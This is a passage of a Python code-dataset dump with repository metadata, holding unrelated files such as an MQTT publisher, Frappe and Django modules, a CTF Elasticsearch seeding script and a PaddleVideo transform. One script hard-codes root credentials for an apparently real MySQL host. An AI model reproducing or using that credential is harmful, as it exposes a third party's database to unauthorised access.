# Subscribe to a topic on the broker.
mqttc.subscribe(TOPIC, 0)
# Start a background thread that receives data from the broker.
mqttc.loop_start()
# BUG FIX: mqttc.loop_stop() followed an endless `while True` loop and was
# unreachable.  try/finally makes sure the network thread is stopped
# cleanly whenever the loop exits (e.g. KeyboardInterrupt).
try:
    while True:
        print("Publishing data...")
        # Publish a new message every two seconds.
        mqttc.publish(TOPIC, "Current number: {}".format(random.randint(0, 100)))
        time.sleep(2)
finally:
    mqttc.loop_stop()
| 23.518519 | 77 | 0.724409 |
510ed5876673fe1388bbf7d8da65384ce0c75909
| 356 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/regional/__init__.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/__init__.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/__init__.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2018, Frappe Technologies and contributors
# For license information, please see license.txt
import frappe
from frappe import _
from erpnext import get_region
def check_deletion_permission(doc, method):
    """Doc-event hook: forbid deleting documents in certain countries.

    Args:
        doc: the document being deleted (unused; required hook signature).
        method: name of the triggering event (unused; required hook signature).

    Raises:
        frappe's validation error (via frappe.throw) when the site's
        region is Nepal or France.
    """
    region = get_region()
    if region in ("Nepal", "France"):
        # BUG FIX: translate the message template first, then format the
        # region into it.  Formatting before _() produces a string that can
        # never match an entry in the translation catalog.
        frappe.throw(_("Deletion is not permitted for country {0}").format(region))
| 32.363636 | 77 | 0.769663 |
5ad86b41dfe4152a2326a658948614ecf4731f23
| 749 |
py
|
Python
|
back-end/src/run_query.py
|
akshah/iodb
|
80fbad1cb639e2cad304d6565cf4918ee5b4e4c0
|
[
"Apache-2.0"
] | null | null | null |
back-end/src/run_query.py
|
akshah/iodb
|
80fbad1cb639e2cad304d6565cf4918ee5b4e4c0
|
[
"Apache-2.0"
] | null | null | null |
back-end/src/run_query.py
|
akshah/iodb
|
80fbad1cb639e2cad304d6565cf4918ee5b4e4c0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
from __future__ import print_function
from collections import defaultdict
from contextlib import closing
import MySQLdb
import sys
def run_query(db, query):
    """Execute *query* on *db*, print every row, and return all rows.

    Args:
        db: a DB-API connection (anything exposing a .cursor() method).
        query: SQL string to execute.

    Returns:
        list: all fetched rows, in fetch order.

    Raises:
        Exception: with message 'Query Failed' when executing/fetching fails.
    """
    fetched = []
    # closing() guarantees the cursor is released even on failure.
    with closing(db.cursor()) as cur:
        try:
            cur.execute(query)
            row = cur.fetchone()
            while row is not None:
                print(row)
                fetched.append(row)
                row = cur.fetchone()
        except Exception:
            # FIX: the original bare `except:` also swallowed
            # KeyboardInterrupt/SystemExit; only real errors should be
            # reported as a failed query.
            raise Exception('Query Failed')
    return fetched
# Prepare DB info.
# NOTE(review): database credentials are hard-coded in source; they should
# be moved to a config file or environment variables.
db = MySQLdb.connect(host="proton.netsec.colostate.edu",
                     user="root",
                     passwd="n3ts3cm5q1",
                     db="iodb")
# Fetch one column from the Message table; run_query() also prints each row.
result=run_query(db,'SELECT PeerIPID FROM Message;')
#for result_v in result:
#    print(result_v)
db.close()
| 19.710526 | 56 | 0.639519 |
5c84a76c3c7e738b481bfc023bcc063134094892
| 1,465 |
py
|
Python
|
kts/core/backend/worker.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 18 |
2019-02-14T13:10:07.000Z
|
2021-11-26T07:10:13.000Z
|
kts/core/backend/worker.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-02-17T14:06:42.000Z
|
2019-09-15T18:05:54.000Z
|
kts/core/backend/worker.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-09-15T13:12:42.000Z
|
2020-04-15T14:05:54.000Z
|
import os
import traceback
from typing import Dict
import pandas as pd
import ray
import kts.core.backend.signal as rs
from kts.core.backend import signal, address_manager
from kts.core.backend.progress import ProgressSignal
from kts.core.backend.signal import RunPID
from kts.core.backend.stats import Stats
from kts.core.frame import KTSFrame
# Ray remote task: runs one feature-computation step out of process and
# returns (result frame, state, stats).  max_retries=0: never re-run on
# failure, since errors are reported through the signal channel instead.
@ray.remote(num_return_vals=3, max_retries=0)
def worker(self, *args, df: pd.DataFrame, meta: Dict):
    # `self` is the feature-constructor object shipped to the worker;
    # run_manager/report must not leak into remote meta, and the parent's
    # pid is required for signalling back.
    assert 'run_manager' not in meta
    assert 'report' not in meta
    assert 'pid' in meta
    # Route signals/address lookups to the parent process.
    signal.pid = meta['pid']
    address_manager.pid = meta['pid']
    kf = KTSFrame(df, meta=meta)
    kf.__meta__['remote'] = True
    # In train mode the (possibly mutated) frame state is returned too.
    return_state = kf._train
    if self.verbose:
        rs.send(ProgressSignal(0, 1, None, None, None))
        io = self.remote_io()
    else:
        io = self.suppress_io()
    # Tell the parent which OS pid this task runs in.
    rs.send(RunPID(os.getpid()))
    stats = Stats(df)
    with stats, io, self.suppress_stderr():
        try:
            res_kf = self.compute(*args, kf)
        except:
            # NOTE(review): bare except also catches KeyboardInterrupt;
            # the traceback is forwarded to the parent as an ErrorSignal.
            rs.send(rs.ErrorSignal(traceback.format_exc()))
            return None, None, None
        # Record the produced column names once, if the result looks frame-like.
        if 'columns' in dir(res_kf) and '__columns' not in kf._state:
            kf._state['__columns'] = list(res_kf.columns)
        if return_state:
            res_state = kf._state
        else:
            res_state = None
        if self.verbose:
            rs.send(ProgressSignal(1, 1, stats.data['took'], None, None))
    return res_kf, res_state, stats.data
| 28.72549 | 69 | 0.664164 |
7a85df348f5f29fd89d42fefc01f170003300bc9
| 1,089 |
py
|
Python
|
tradingbot/core/config.py
|
stefaniuk/trading-bot
|
403abd2b53caf686a6d2456e7eab124c670e7340
|
[
"MIT"
] | 3 |
2018-05-10T13:51:42.000Z
|
2020-07-05T16:43:45.000Z
|
tradingbot/core/config.py
|
stefaniuk/trading-bot
|
403abd2b53caf686a6d2456e7eab124c670e7340
|
[
"MIT"
] | null | null | null |
tradingbot/core/config.py
|
stefaniuk/trading-bot
|
403abd2b53caf686a6d2456e7eab124c670e7340
|
[
"MIT"
] | 1 |
2020-04-22T09:06:17.000Z
|
2020-04-22T09:06:17.000Z
|
import configparser
import os
class Configurer(object):
    """Small wrapper around configparser for the bot's data file.

    The config file lives in the package root, i.e. the parent directory
    of the directory that contains this module.
    """

    def __init__(self, name="data.ini"):
        self.config = configparser.ConfigParser()
        # Absolute path of the config file inside the package root.
        self.config_file = self._combine(name)

    def _combine(self, path):
        """Return *path* resolved against the package root directory."""
        return os.path.join(os.path.dirname(os.path.dirname(__file__)), path)

    def write(self):
        """Persist the current in-memory configuration to disk."""
        with open(self.config_file, 'w') as cf:
            self.config.write(cf)

    def addLogin(self, username, password):
        """Store Trading212 credentials and write the file.

        NOTE(review): credentials are stored in plain text.
        """
        self.config['TRADING212'] = {'username': username,
                                     'password': password}
        self.write()

    def addMonitor(self, username, password, stocks):
        """Store monitor credentials/stock list and write the file."""
        self.config['MONITOR'] = {'username': username,
                                  'password': password,
                                  'stocks': stocks,
                                  'initiated': 0}
        self.write()

    def read(self):
        """Load the configuration file from disk into self.config."""
        self.config.read(self.config_file)

    def checkFile(self):
        """Return 1 if the config file exists on disk, else 0.

        BUG FIX: self.config_file is already the combined absolute path;
        the original passed it through _combine() a second time.
        """
        return 1 if os.path.isfile(self.config_file) else 0
| 29.432432 | 77 | 0.545455 |
8f8db2af3a47bbf9a55d8a9e2f6a7ea22d477c2b
| 377 |
py
|
Python
|
tag_1/p_3_2_fakultaet_berechnen.py
|
techrabbit58/uebung_informatik_vorkurs
|
e99312ae66ccccd6bfe45bfd3c3f43c01690659c
|
[
"Unlicense"
] | null | null | null |
tag_1/p_3_2_fakultaet_berechnen.py
|
techrabbit58/uebung_informatik_vorkurs
|
e99312ae66ccccd6bfe45bfd3c3f43c01690659c
|
[
"Unlicense"
] | null | null | null |
tag_1/p_3_2_fakultaet_berechnen.py
|
techrabbit58/uebung_informatik_vorkurs
|
e99312ae66ccccd6bfe45bfd3c3f43c01690659c
|
[
"Unlicense"
] | null | null | null |
"""
3 for/whils-Schleifen (Tag 1)
3.2 Schreibe ein Programm, das für eine vorher festgelegte Zahl die Fakultät berechnet.
Beispiele:
- 5! = 120
- 10! = 3628800
"""
def fakultaet(n):
    """Return n! computed iteratively; for n <= 1 (incl. negatives) return 1."""
    produkt = 1
    # Multiply 2 * 3 * ... * n; an empty range leaves the product at 1.
    for faktor in range(2, n + 1):
        produkt *= faktor
    return produkt
# Self-test: verify the two examples given on the exercise sheet.
if __name__ == '__main__':
    assert fakultaet(5) == 120
    assert fakultaet(10) == 3628800
| 17.136364 | 87 | 0.604775 |
56f5289febffa30278a50b6d4923dd0ea6c73986
| 1,229 |
py
|
Python
|
bildungslogin-plugin/bildungslogin_plugin/backend.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
bildungslogin-plugin/bildungslogin_plugin/backend.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
bildungslogin-plugin/bildungslogin_plugin/backend.py
|
univention/bildungslogin
|
29bebe858a5445dd5566aad594b33b9dd716eca4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import annotations
import abc
from .models import User
class ConfigurationError(ConnectionError):
...
class DbConnectionError(ConnectionError):
...
class UserNotFound(Exception):
...
class DbBackend(abc.ABC):
"""Base class for LDAP database access."""
def __init__(self, *args, **kwargs):
"""
:raises ConfigurationError: when the data passed in `args` or `kwargs` is not as expected
"""
...
async def connection_test(self) -> None:
"""
Test DB connection.
:return: nothing if successful or raises an error
:raises DbConnectionError: if connecting failed
"""
raise NotImplementedError # pragma: no cover
async def get_user(self, username: str) -> User:
"""
Load a user object and its school, class and license information from LDAP.
:param str username: the `uid` LDAP attribute
:return: User object
:rtype: User
:raises ConnectionError: when a problem with the connection happens
:raises UserNotFound: when a user could not be found in the DB
"""
raise NotImplementedError # pragma: no cover
| 24.58 | 97 | 0.634662 |
85410c74b57eb924a702e9207da61927e86c9a72
| 1,084 |
py
|
Python
|
Theories/Algorithms/Recursion2/Searcha2DMatrixII/search_2d_matrixII.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Theories/Algorithms/Recursion2/Searcha2DMatrixII/search_2d_matrixII.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Theories/Algorithms/Recursion2/Searcha2DMatrixII/search_2d_matrixII.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from typing import List
# Solution 1
def searchMatrix(matrix: List[List[int]], target: int) -> bool:
    """Search *target* in a matrix whose rows and columns are sorted ascending.

    Walks from the top-right corner: moving left decreases the value,
    moving down increases it, so every step discards one row or column
    (O(rows + cols) time, O(1) space).

    Args:
        matrix: 2D list with rows and columns sorted in ascending order.
        target: value to look for.

    Returns:
        True if target occurs in the matrix, else False.
    """
    # Robustness fix: the original raised IndexError for an empty matrix
    # or a matrix whose rows are empty.
    if not matrix or not matrix[0]:
        return False
    cur_col, cur_row = len(matrix[0]) - 1, 0
    while cur_col >= 0 and cur_row < len(matrix):
        value = matrix[cur_row][cur_col]
        if value > target:
            cur_col -= 1
        elif value < target:
            cur_row += 1
        else:
            return True
    return False
# Solution 2
# def searchMatrix(matrix: List[List[int]], target: int)-> bool:
# m, n = len(matrix), len(matrix[0])
#
# for row in matrix:
#
# # range check
# if row[0] <= target <= row[-1]:
#
# # launch binary search on current possible row
#
# left, right = 0, n - 1
#
# while left <= right:
#
#             mid = left + ((right - left) >> 1)  # parentheses needed: + binds tighter than >>
#
# mid_value = row[mid]
#
# if target > mid_value:
# left = mid + 1
# elif target < mid_value:
# right = mid - 1
# else:
# return True
#
# return False
| 25.809524 | 64 | 0.479705 |
f136cb09a267ce07c92ec9a4012ff1753bf15377
| 3,466 |
py
|
Python
|
halfint_test.py
|
mark-caprio/am
|
e2c715513ca1b9df98e71b78084914f00a50f8dc
|
[
"MIT"
] | 1 |
2020-03-30T18:34:33.000Z
|
2020-03-30T18:34:33.000Z
|
halfint_test.py
|
mark-caprio/am
|
e2c715513ca1b9df98e71b78084914f00a50f8dc
|
[
"MIT"
] | null | null | null |
halfint_test.py
|
mark-caprio/am
|
e2c715513ca1b9df98e71b78084914f00a50f8dc
|
[
"MIT"
] | 3 |
2019-02-24T20:23:16.000Z
|
2019-08-09T02:14:45.000Z
|
"""Provide Python port of halfint_test.cpp unit tests.
Language: Python 3
Mark A. Caprio
University of Notre Dame
05/17/20 (mac): Created.
06/26/20 (mac): Finish converting tests. Add dict key test.
"""
import am
# Exercise the `am` HalfInt bindings; each print mirrors the C++ unit test
# shown in the comment block above it (output is compared by eye).
if (__name__=="__main__"):
    # // HalfInt arithmetic tests
    # std::cout << HalfInt(3) << " " << HalfInt(3,1) << " " << HalfInt(3,2) << std::endl;
    # std::cout << TwiceValue(HalfInt(3,2)) << std::endl;
    # std::cout << std::max(HalfInt(5,2),HalfInt(1,2)) << std::endl;
    # std::cout << std::min(HalfInt(5,2),HalfInt(1,2)) << std::endl;
    # std::cout << HalfInt(-1,2) << " -> " << abs(HalfInt(-1,2)) << std::endl;
    # std::cout << HalfInt(7,2) << " -> " << abs(HalfInt(7,2)) << std::endl;
    # std::cout << -HalfInt(1,2) << std::endl;
    # std::cout << HalfInt(1)+HalfInt(1,2) << std::endl;
    # std::cout << 0+HalfInt(1,2) << std::endl;
    # std::cout << 1+HalfInt(1,2) << std::endl;
    # //std::cout << "double... " << 1.0 + DValue(HalfInt(1,2)) << std::endl;
    # std::cout << "double... " << 1.0 + double(HalfInt(1,2)) << std::endl;
    # std::cout << "****" << std::endl;
    # // should cause compiler failure:
    # // std::cout << "fallacious but lucky... 1.0 + HalfInt(1,2) = " << 1.0 + HalfInt(1,2) << std::endl;
    # // std::cout << "fallacious and not lucky... 0.5 + HalfInt(1,2) = " << 0.5 + HalfInt(1,2) << std::endl;
    # // std::cout << "****" << std::endl;
    print("{} {}".format(am.HalfInt(3),am.HalfInt(3,2)))
    print("{} {}".format(am.TwiceValue(am.HalfInt(3,2)),am.HalfInt(3,2).TwiceValue()))
    print("{}".format(max(am.HalfInt(5,2),am.HalfInt(1,2))))
    print("{}".format(min(am.HalfInt(5,2),am.HalfInt(1,2))))
    print("{} {}".format(am.HalfInt(-1,2),abs(am.HalfInt(-1,2))))
    print("{} {}".format(am.HalfInt(7,2),abs(am.HalfInt(7,2))))
    print("{}".format(-am.HalfInt(1,2)))
    print("{}".format(am.HalfInt(1)+am.HalfInt(1,2)))
    print("{} {}".format(0+am.HalfInt(1,2),1+am.HalfInt(1,2)))
    print("{}".format(1.0+float(am.HalfInt(1,2))))
    # float + HalfInt is deliberately not defined; expect a TypeError.
    try:
        print("{}".format(1.0+am.HalfInt(1,2)))
    except TypeError as e:
        print(e)
    # // invalid denominator
    # // std::cout << HalfInt(7,4) << std::endl; // causes throw
    # Constructing with a denominator other than 1 or 2 must raise.
    try:
        print("{}".format(am.HalfInt(7,4)))
    except ValueError as e:
        print(e)
    # // integer truncation
    # std::cout << int(HalfInt(4,2)) << " " << int(HalfInt(3,2)) << " " << int(HalfInt(-3,2)) << std::endl;
    print("{} {} {}".format(int(am.HalfInt(4,2)),int(am.HalfInt(3,2)),int(am.HalfInt(-3,2))))
    # // hat arithmetic
    # std::cout << Hat(HalfInt(1,2)) << " " << Hat(1) << std::endl;
    print("{} {}".format(am.Hat(am.HalfInt(1,2)),am.Hat(1)))
    # // parity sign
    # std::cout << ParitySign(-1) << std::endl;
    print("{} {}".format(am.ParitySign(-1),am.ParitySign(am.HalfInt(-2,2))))
    # // complex phase
    # std::cout << Phase(HalfInt(1,2)) << std::endl;
    print("{}".format(am.Phase(am.HalfInt(1,2))))
    # // hashing
    # std::cout << "hash " << HalfInt(1,2).Str() << " " << hash_value(HalfInt(1,2)) << " "
    #   << HalfInt(22,2).Str() << " " << hash_value(HalfInt(22,2)) << std::endl;
    # std::cout << "****" << std::endl;
    print("{} {}".format(am.HalfInt(1,2).__hash__(),am.HalfInt(22,2).__hash__()))
    # Python: HalfInt as dict key (requires working __hash__/__eq__)
    d = {am.HalfInt(1,2): 999}
    print("{} {}".format(d,d[am.HalfInt(1,2)]))
| 39.386364 | 109 | 0.525389 |
7418152193c9bec0825044c0d6dc3cc35aad42ca
| 2,094 |
py
|
Python
|
packages/watchmen-pipeline-kernel/src/watchmen_pipeline_kernel/pipeline/monitor_log_invoker.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-pipeline-kernel/src/watchmen_pipeline_kernel/pipeline/monitor_log_invoker.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-pipeline-kernel/src/watchmen_pipeline_kernel/pipeline/monitor_log_invoker.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from asyncio import ensure_future, run
from logging import getLogger
from typing import Callable
from watchmen_auth import PrincipalService
from watchmen_data_kernel.meta import TopicService
from watchmen_data_kernel.topic_schema import TopicSchema
from watchmen_model.admin import PipelineTriggerType, TopicKind
from watchmen_model.pipeline_kernel import PipelineMonitorLog, PipelineTriggerTraceId
from watchmen_pipeline_kernel.common import PipelineKernelException
from .pipeline_trigger import PipelineTrigger
# Module-level logger used to record monitor logs that must not re-trigger pipelines.
logger = getLogger(__name__)
def get_topic_service(principal_service: PrincipalService) -> TopicService:
	"""Create a TopicService operating on behalf of the given principal."""
	service = TopicService(principal_service)
	return service
def find_topic_schema(name: str, principal_service: PrincipalService) -> TopicSchema:
	"""Look up a topic schema by name within the principal's tenant.

	Raises PipelineKernelException when no schema with that name exists
	for the tenant.
	"""
	tenant_id = principal_service.get_tenant_id()
	found = get_topic_service(principal_service).find_schema_by_name(name, tenant_id)
	if found is not None:
		return found
	raise PipelineKernelException(
		f'Topic schema[name={name}, tenant={tenant_id}] not found.')
def create_monitor_log_pipeline_invoker(
		trace_id: PipelineTriggerTraceId, principal_service: PrincipalService
) -> Callable[[PipelineMonitorLog, bool], None]:
	"""Build a callback that either re-triggers pipelines from a monitor log or just logs it.

	System-kind (and unknown) topics are only logged, which prevents monitor-log
	pipelines from recursively triggering themselves.
	"""
	def handle_monitor_log(monitor_log: PipelineMonitorLog, asynchronized: bool) -> None:
		# trigger pipeline or log by monitor log
		# find the trigger topic
		topic_id = monitor_log.topicId
		topic_service = get_topic_service(principal_service)
		topic = topic_service.find_by_id(topic_id)
		if topic is None or topic.kind == TopicKind.SYSTEM:
			# will not trigger monitor log pipelines again
			logger.info(monitor_log)
		else:
			schema = find_topic_schema('raw_pipeline_monitor_log', principal_service)
			# The trigger receives this same handler so that nested pipeline runs
			# report their monitor logs through the identical path.
			trigger = PipelineTrigger(
				trigger_topic_schema=schema,
				trigger_type=PipelineTriggerType.INSERT,
				trigger_data=monitor_log.dict(),
				trace_id=trace_id,
				principal_service=principal_service,
				asynchronized=asynchronized,
				handle_monitor_log=handle_monitor_log
			)
			if asynchronized:
				# Schedule on the already-running event loop.
				ensure_future(trigger.invoke())
			else:
				# No loop running: execute the coroutine to completion here.
				run(trigger.invoke())
	return handle_monitor_log
| 36.736842 | 107 | 0.815186 |
741d6794c1ebfa61b7c121ee6bec65d1b0d65313
| 1,320 |
py
|
Python
|
3kCTF/2021/web/pawnshop/apache/elastic_init.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
3kCTF/2021/web/pawnshop/apache/elastic_init.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
3kCTF/2021/web/pawnshop/apache/elastic_init.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
from elasticsearch import Elasticsearch
import random
import string
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    """Return a random string of *size* characters drawn from *chars*."""
    picked = [random.choice(chars) for _ in range(size)]
    return ''.join(picked)
# Connect to the challenge's internal Elasticsearch node.
es_client = Elasticsearch(['http://172.30.0.7:9200'])
FLAG = '3k{*REDACTED*}'
# Seed the pawnshop inventory; sellers/values are randomized except entry 5,
# whose value holds the flag.
entries=[]
entries.append({"id":1,"picture":"axe.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"Memory leak Axe","value":id_generator(10)})
entries.append({"id":2,"picture":"drill.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"SUID drill","value":id_generator(10)})
entries.append({"id":3,"picture":"rifle.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"ROP rifle","value":id_generator(10)})
entries.append({"id":4,"picture":"bullets.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"Syscall bullets","value":id_generator(10)})
entries.append({"id":5,"picture":"flag.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"Flag","value":FLAG})
entries.append({"id":6,"picture":"hammer.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"0day hammer","value":id_generator(10)})
# Bulk-API payload: an action/metadata line followed by each document.
body = []
for entry in entries:
    body.append({'index': {'_id': entry['id']}})
    body.append(entry)
response = es_client.bulk(index='pawnshop', body=body)
print(response)
| 47.142857 | 149 | 0.70303 |
74420c44a41363e56423cd99a1dba7e259be2177
| 1,666 |
py
|
Python
|
backend/utils/validate_json.py
|
methodpark/digitaleswarten
|
024c0b88df54e9727925b202e139b3c5b2ce73d6
|
[
"Apache-2.0"
] | 10 |
2020-03-20T19:14:43.000Z
|
2020-10-29T21:31:40.000Z
|
backend/utils/validate_json.py
|
methodpark/digitaleswarten
|
024c0b88df54e9727925b202e139b3c5b2ce73d6
|
[
"Apache-2.0"
] | 41 |
2020-03-20T20:27:55.000Z
|
2020-03-24T21:49:37.000Z
|
backend/utils/validate_json.py
|
methodpark/digitaleswarten
|
024c0b88df54e9727925b202e139b3c5b2ce73d6
|
[
"Apache-2.0"
] | 1 |
2020-03-21T09:31:51.000Z
|
2020-03-21T09:31:51.000Z
|
from flask import abort
from jsonschema import validate, ValidationError
def has_json_header(request):
    """
    Checks if a request contains json content.
    Throws 400 otherwise.
    """
    # Use .get() so a request without any Content-Type header is rejected
    # with 400 instead of raising a KeyError (which Flask turns into a 500).
    if 'application/json' not in request.headers.get('Content-Type', ''):
        abort(400)
def validate_format(data, schema):
    """Raise ValidationError unless data has exactly the schema's declared property keys."""
    expected_keys = set(schema['properties'])
    if set(data) != expected_keys:
        raise ValidationError('')
def validate_schema(data, schema):
    """Return True when data satisfies the JSON schema AND contains exactly its declared keys."""
    try:
        validate(data, schema=schema)
        # Stricter than plain jsonschema validation: extra keys are rejected too.
        validate_format(data, schema=schema)
        return True
    except ValidationError:
        return False
def validate_places_post(data):
    """Validate a POST /places payload: exactly one string field 'placeName'."""
    schema = {
        'type': 'object',
        'properties': {'placeName': {'type': 'string'}},
    }
    return validate_schema(data, schema)
def validate_queues_post(data):
    """Validate a POST /queues payload: exactly one string field 'queueName'."""
    schema = {
        'type': 'object',
        'properties': {'queueName': {'type': 'string'}},
    }
    return validate_schema(data, schema)
def validate_entries_post(data):
    """Validate a POST /entries payload: exactly one string field 'name'."""
    schema = {
        'type': 'object',
        'properties': {'name': {'type': 'string'}},
    }
    return validate_schema(data, schema)
def validate_entry_state_set(data):
    """Validate an entry-state update payload: exactly one string field 'state'."""
    schema = {
        'type': 'object',
        'properties': {'state': {'type': 'string'}},
    }
    return validate_schema(data, schema)
def validate_put_name_storage(data):
    """Validate a name-storage PUT payload: exactly one boolean field 'nameStorage'."""
    schema = {
        'type': 'object',
        'properties': {'nameStorage': {'type': 'boolean'}},
    }
    return validate_schema(data, schema)
| 20.825 | 65 | 0.558223 |
748e9dc6f0fa26d6c661380be2faa7d242d2ef9f
| 440 |
py
|
Python
|
nnc/migrations/0003_product_description.py
|
JanakiRaman-2002/Arre-yaar
|
c0b44ca1f8884a09116241dcd0bf7cfcee3b785d
|
[
"Apache-2.0"
] | null | null | null |
nnc/migrations/0003_product_description.py
|
JanakiRaman-2002/Arre-yaar
|
c0b44ca1f8884a09116241dcd0bf7cfcee3b785d
|
[
"Apache-2.0"
] | null | null | null |
nnc/migrations/0003_product_description.py
|
JanakiRaman-2002/Arre-yaar
|
c0b44ca1f8884a09116241dcd0bf7cfcee3b785d
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.2 on 2021-07-31 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds a required 'description' CharField to Product; the temporary
    # default ('Product') only back-fills existing rows during migration.
    dependencies = [
        ('nnc', '0002_auto_20210729_1145'),
    ]
    operations = [
        migrations.AddField(
            model_name='product',
            name='description',
            field=models.CharField(default='Product', max_length=100),
            preserve_default=False,
        ),
    ]
| 22 | 70 | 0.604545 |
247144267cc3a246754d8f4568bea346b485f116
| 4,370 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/segmentation.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 5 |
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/segmentation.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-14T02:33:28.000Z
|
2022-01-14T02:33:28.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/segmentation.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-03-07T10:51:21.000Z
|
2022-03-07T10:51:21.000Z
|
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from PIL import Image
import copy
import cv2
from ..registry import PIPELINES
@PIPELINES.register()
class MultiRestrictSize(object):
    """Produce multi-scale (and optionally flipped) resized copies of a sample.

    Each entry of ``multi_scale`` yields one resized sample dict; with
    ``flip=True`` a horizontally mirrored copy of the last sample is appended
    as well. Exactly one of ``min_size``/``max_size`` may be set (the assert
    below enforces that at least one is None).
    """
    def __init__(self,
                 min_size=None,
                 max_size=800,
                 flip=False,
                 multi_scale=[1.3]):
        # NOTE(review): multi_scale is a mutable default argument; it is never
        # mutated here, but sharing one list across instances is fragile.
        self.min_size = min_size
        self.max_size = max_size
        self.multi_scale = multi_scale
        self.flip = flip
        assert ((min_size is None)) or ((max_size is None))
    def __call__(self, sample):
        samples = []
        image = sample['current_img']
        h, w = image.shape[:2]
        for scale in self.multi_scale:
            # Fixed range of scales
            sc = None
            # Align short edge
            if not (self.min_size is None):
                if h > w:
                    short_edge = w
                else:
                    short_edge = h
                if short_edge > self.min_size:
                    sc = float(self.min_size) / short_edge
            else:
                # Align long edge against max_size instead.
                if h > w:
                    long_edge = h
                else:
                    long_edge = w
                if long_edge > self.max_size:
                    sc = float(self.max_size) / long_edge
            if sc is None:
                new_h = h
                new_w = w
            else:
                new_h = sc * h
                new_w = sc * w
            new_h = int(new_h * scale)
            new_w = int(new_w * scale)
            # Snap both dimensions to the nearest (16k + 1) value, which the
            # downstream network presumably requires — TODO confirm.
            if (new_h - 1) % 16 != 0:
                new_h = int(np.around((new_h - 1) / 16.) * 16 + 1)
            if (new_w - 1) % 16 != 0:
                new_w = int(np.around((new_w - 1) / 16.) * 16 + 1)
            if new_h == h and new_w == w:
                # No resize needed: reuse the original sample dict as-is.
                samples.append(sample)
            else:
                new_sample = {}
                for elem in sample.keys():
                    # 'meta' and 'label' entries are copied by reference, not resized.
                    if 'meta' in elem:
                        new_sample[elem] = sample[elem]
                        continue
                    tmp = sample[elem]
                    if 'label' in elem:
                        new_sample[elem] = sample[elem]
                        continue
                    else:
                        flagval = cv2.INTER_CUBIC
                        tmp = cv2.resize(tmp,
                                         dsize=(new_w, new_h),
